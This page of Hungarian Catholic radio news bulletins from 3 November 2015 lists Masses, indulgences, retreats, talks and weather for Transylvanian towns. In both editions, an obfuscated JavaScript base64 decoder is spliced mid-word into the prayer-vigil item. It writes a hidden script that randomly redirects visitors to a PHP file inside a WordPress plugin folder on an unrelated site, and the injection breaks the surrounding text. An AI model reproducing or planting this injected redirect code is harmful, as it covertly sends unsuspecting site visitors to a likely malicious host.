2015. november 3. – Hírek és programajánló

H Í R E K   E S T E

Örökös szentségimádási nap
A Gyulafehérvári főegyházmegyében holnap, november 4-én Futásfalván tartják az örökös szentségimádási napot. Várják a híveket a közös imádatra.

Búcsú elnyerése az elhunytak számára
November 1.-vel kezdődően, 8 napon át teljes búcsú nyerhető a halottak javára. Feltételek: meglátogatni egy temetőt, imádkozni az elhunytakért, elvégezve a Szentatya szándékára a Hiszekegyet, Miatyánkot, Üdvözlégy Máriát és szentségekhez járulni.

Búcsú a nagyváradi püspöki palota kápolnájában
Holnap, november 4-én, Borromeo Szent Károly ünnepén délelőtt tizenegy órakor Böcskei László megyéspüspök, ünnepi szentmisét mutat be az egyházmegye papságával, szerzeteseivel és hitoktatóival közösen a Püspöki Palota kápolnájában, ennek búcsúünnepe alkalmából. A szentmise meghívott szónoka a Megszentelt Élet Éve és Avilai Szent Teréz születésének 500. évfordulója apropóján Béri László Renátó karmelita atya. Az eseményre nagy szeretettel várják azokat a híveket is, akik városuk és egyházmegyéjük megújulásáért szeretnének közösen imádkozni.

Szerdai pár-beszéd Marosvásárhelyen
A szerdai párbeszédek második évadjában a tizenegyedik alkalom következik. Témája: Elengedés, veszteségeink. Meghívott előadók Szénégető István plébános, Papp Béni református lelkipásztor és Nyulas Kinga orvos. Minden érdeklődőt várnak holnap este hét órára az Ama Deus cukrászdába.

Engesztelő imavirrasztás Székelyudvarhelyen
A Mária Rádió székelyudvarhelyi kápolnájában minden hónap első szerdáján egész éjjel virrasztást tartanak, tizenegy órától szentmisét mutatnak be. Az engesztelő imavirrasztásra hívnak együtt imádkozni mindenkit, aki Jézussal szeretne időt tölteni. A virrasztást városukért, egyházközségeikért, a fiatalok testi-lelki tisztaságáért, a családokért, egyedülállókért, a jegyesekért, gyermeket vágyó és váró szülőkért, betegekért, elhunyt szeretteikért, saját magukért és egyéni szándékokra ajánlják az  udvarhelyiek. A kápolnában ugyanakkor minden reggel nyolc órától este nyolc óráig állfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó, egész napos szentségimádás van. Várják az Istent imádni, engesztelni vágyókat.

Beszélgetőest a segítőnővérekkel
Novemberi remény? - mottóval csütörtökön este 6 órától beszélgetőestet tartanak a segítőnővérek   Marosvásárhelyen, az Ama Deus cukrászdában. Az est témái: élet és halál, közösség az elöttünk jártakkal, gyász és elengedés, krizis és esély az újrakezdésre, a belső szabadságban való növekedés, Isten szeretetének és minden igaz szeretetnek átalakító ereje. Várnak mindenkit a közös beszélgetésre.

Szent Imre napi búcsúk
November 5-én, Szent Imre napján, búcsút ünnepelnek Gelence hívei. Az ünnepi szentmise délelőtt tizenegy órakor kezdődik, melynek főcelebránsa és szónoka Márfi Gyula veszprémi érsek. Az egyházközség tagjai várják a környező falvak papjait és híveit a közös ünneplésre. Ezt a szentmisét rádiónk élő adásban közvetíti.
Szintén ezen a napon ünnepelik a székelyudvarhelyi  Tamási Áron Gimnázium bentlakásában lévő kápolna búcsúját, melyet Szent Imre herceg tiszteletére szenteltek fel. Az ünneplés este 6 órától, szentmisével kezdődik, szentbeszédet mond Kovács József, a Szent György Plébánián szolgálatot teljesítő, gyakorlati éves kispap. A szentmise után ünnepi megemlékezésre kerül sor Szent Imre hercegről a díszteremben.

Promóciós körút novemberben
Szilágyi László, rádiónk promóciós munkatársa Székelyudvarhely környékére látogat november 5-9 között, amikor több helyszínen lehet majd vele találkozni. November 5-én, csütörtökön délután fél 6 órától Zetelakán, november 6-án, pénteken délelőtt 10 órától Lengyelfalván, déli 12 órától Székelyszentléleken, délután 3 órától Bogárfalván, majd este 6 órától Parajdon lesz közönségtalálkozó. A következő helyszínekről hírműsorainkban értesítjük hallgatóinkat.

Elsőpénteki keresztút az Ugron-kápolnánál
November  6-án, délután 5 órától keresztúti ájtatosságot tartanak a szejkefürdői Ugron-kápolna felé vezető Székely Kálvárián. Várják mindazokat, akik családjainkért felajánlanak egy keresztútjárásnyi időt és imát.

Párkapcsolati műhely Nagyváradon
A Kalocsa-Kecskeméti Főegyházmegye Parázs Pasztorális Központja november 6.-án és 7.-én párkapcsolati műhelyt tart Nagyváradon a Kanonok Sor 13. szám alatt az egyházmegye családjai számára.

„Elküldött, hogy örömhírt vigyek a szegényeknek és meggyógyítsam a megtört szívűeket”
Ezzel a mottóval bibliás hétvégét tartanak fiataloknak és felnőtteknek november 6–8. között a székelyudvarhelyi Szent Pio Lelkigyakorlatos Házban. A Katolikus Magyar Bibliatársulat rendezvényének témája a próféták. Ma van az utolsó jelentkezési nap, érdeklődni Szabó Bernadettnél a 0745-311855-ös telefonszámon vagy az szdetti@yahoo.com e-mail címen lehet.

Szentignáci lelkigyakorlat Csíkszentdomokoson
November 23.- 27. között személyesen kísért szentignáci lelkigyakorlatot hirdetnek a csíkszentdomokosi Szent Margit Házban. A lelkigyakorlat elemei: napi négy személyes elmélkedés, közös ima, észlelési testgyakorlatok, szentmise, csend a lelkigyakorlat teljes ideje alatt. Kísérők: Ilyés Erika  és Darvas Piroska segítőnővérek. Jelentkezni november 16-ig a 0743-753494  telefon számon vagy a darvas.piroska@yahoo.com címen lehet.

Az időjárásról: Holnap tartósan ködös, borongós időre számíthatunk, csapadék nem valószínű. A légmozgás gyenge marad. A reggeli órákban fagypont alatti értékekre kell készülni, a hegyvidéken akár -9 C fok is előfordulhat. A délután folyamán 11-17 fokot mérhetünk.

MRE - Hírszolgálat, 2015. november 3.


H Í R E K   R E G G E L / D É L B E N

Örökös szentségimádási nap
A gyulafehérvári egyházmegyében ma Alsócsernátonban van örökös szentségimádási nap. Várják a híveket a közös imádatra.

Búcsú elnyerése az elhunytak részére
November 1.-vel kezdődően, 8 napon át teljes búcsú nyerhető a halottak javára. Feltételek: meglátogatni egy temetőt, imádkozni az elhunytakért, elvégezve a Szentatya szándékára a Hiszekegyet, Miatyánkot, Üdvözlégy Máriát és szentségekhez járulni.

Szerdai pár-beszéd Marosvásárhelyen
A szerdai párbeszédek második évadjában a tizenegyedik alkalom következik. Témája: Elengedés, veszteségeink. Meghívott előadók Szénégető István plébános, Papp Béni református lelkipásztor és Nyulas Kinga orvos. Minden érdeklődőt várnak holnap este hét órára az Ama Deus cukrászdába.

Beszélgetőest a segítőnővérekkel
Novemberi remény? -mottóval, beszélgetőestet tartanak a segítőnővérek csütörtökön délután hat órától Marosvásárhelyen az Ama Deus cukrászdában. Az est témái: élet és halál, közösség az elöttünk jártakkal, gyász és elengedés, krizis és esély az újrakezdésre, a belső szabadságban való növekedés, Isten szeretetének és minden igaz szeretetnek átalakító ereje. Várnak mindenkit a közös beszélgetésre.

Elsőpénteki keresztút az Ugron-kápolnánál
November  6-án, délután öt órától keresztúti ájtatosságot tartanak a szejkefürdői Ugron-kápolna felé vezető Székely Kálvárián. Várják mindazokat, akik családjainkért felajánlanak egy keresztútjárásnyi időt és imát.

Engesztelő imavirrasztás Székelyudvarhelyen
A Mária Rádió székelyudvarhelyi kápolnájában minden hónap első szerdáján egész éjjel virrasztást tartanak, tizenegy órától szentmisét mutatnak be. Az engesztelő imavirrasztásra hívnak együtt imádkozni mindenkit, aki Jézussal szeretne időt tölteni. A virrasztást városukért, egyházközségeikért, a fiatalok testi-lelki tisztaságáért, a családokért, egyedülállókért, a jegyesekért, gyermeket vágyó és váró szülőkért, betegekért, elhunyt szeretteikért, saját magukért és egyéni szándékokra ajánlják az  udvarhelyiek. A kápolnában ugyanakkor minden reggel nyolc órától este nyolc óráig állfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó, egész napos szentségimádás van. Várják az Istent imádni, engesztelni vágyókat.

Búcsú Gelencén
November 5-én, Szent Imre napján, búcsút ünnepelnek Gelence hívei. Az ünnepi szentmise délelőtt tizenegy órakor kezdődik, melynek főcelebránsa és szónoka Márfi Gyula veszprémi érsek. Az egyházközség tagjai várják a környező falvak papjait és híveit a közös ünneplésre. A szentmisét rádiónk élőben közvetíti.

Szent Imre-napi ünnep
November 5-e csütörtök, Szent Imre  napja. Ezen a napon ünnepelik a székelyudvarhelyi  Tamási Áron Gimnázium bentlakásában lévő kápolna búcsúját, melyet Szent Imre herceg tiszteletére szenteltek fel. Az ünneplés este hat órától, szentmisével kezdődik, szentbeszédet mond Kovács József, a Szent György Plébánián szolgálatot teljesítő, gyakorlati éves kispap. A szentmise után ünnepi megemlékezésre kerül sor Szent Imre hercegről a díszteremben.

„Elküldött, hogy örömhírt vigyek a szegényeknek és meggyógyítsam a megtört szívűeket”
Ezzel a mottóval bibliás hétvégét tartanak fiataloknak és felnőtteknek november 6–8. között a székelyudvarhelyi Szent Pio Lelkigyakorlatos Házban. A Katolikus Magyar Bibliatársulat rendezvényének témája a próféták. Ma van az utolsó jelentkezési nap, érdeklődni Szabó Bernadettnél a 0745-311855-ös telefonszámon vagy az szdetti@yahoo.com e-mail címen lehet.

Szentignáci lelkigyakorlat Csíkszentdomokoson
November 23.- 27. között személyesen kísért szentignáci lelkigyakorlatot hirdetnek a csíkszentdomokosi Szent Margit Házban. A lelkigyakorlat elemei: napi négy személyes elmélkedés, közös ima, észlelési testgyakorlatok, szentmise, csend a lelkigyakorlat teljes ideje alatt. Kísérők: Ilyés Erika  és Darvas Piroska segítőnővérek. Jelentkezni november 16-ig a 0743-753494  telefon számon vagy a darvas.piroska@yahoo.com címen lehet.

Promóciós körút novemberben
Szilágyi László, rádiónk promóciós munkatársa Székelyudvarhely környékére látogat november 5-9 között, amikor több helyszínen lehet majd vele találkozni: 5-én délután fél hat órától Zetelakán, 6-án délelőtt tíz órától Lengyelfalván, déli tizenkét órától Székelyszentléleken, három órától Bogárfalván, majd este hat órától Parajdon lesz közönségtalálkozó. A következő helyszínekről hírműsorainkban értesítjük hallgatóinkat. Várjuk mindazon hallgatókat akik többet szeretnének megtudni rádiónkról.

Az időjárásról: A reggeli pára, köd helyenként tartósabban megmaradhat, napközben viszont ismét sokfelé kisüt a nap. Északnyugaton megélénkülhet a szél. Reggel többfelé fagypont alá sülyed a levegő hőmérséklete, a hegyvidéken akár -10 fok is lehet. Délután 10-15°C várható.

MRE - Hírszolgálat, 2015. november 3.

About the author

maradmin

Leave a Comment